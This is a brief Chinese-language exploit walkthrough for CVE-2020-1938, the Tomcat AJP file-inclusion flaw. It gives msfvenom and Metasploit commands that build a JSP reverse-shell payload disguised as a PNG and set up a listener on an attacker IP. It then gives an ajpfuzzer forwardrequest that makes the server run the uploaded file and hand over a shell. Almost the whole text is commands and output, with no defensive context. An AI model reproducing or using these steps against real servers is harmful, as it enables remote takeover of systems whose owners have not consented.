CVE-2020-1938(RCE利用)
1.使用msf生成反彈shell馬,並且監聽
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R > shell.png
假設利用上傳點,把此圖片上傳到了目標服務器/log/shell.png。
在msf監聽:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.223.129
lhost => 192.168.223.129
msf exploit(multi/handler) > set lport 6666
lport => 6666
msf exploit(multi/handler) >exploit
2.發送AJP包,獲取shell
使用AJP包構造工具來發送ajp包,以ajpfuzzer爲例:
運行:java -jar ajpfuzzer_v0.6.jar
連接目標端口:connect 192.168.223.1 8009
執行以下命令:
forwardrequest 2 "HTTP/1.1" "/123.jsp" 192.168.223.1 192.168.223.1 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:/","javax.servlet.include.path_info:log/shell.png","javax.servlet.include.servlet_path:/"
可以看到,請求發送成功後,shell.png被作爲jsp解析,成功獲取目標服務器的shell。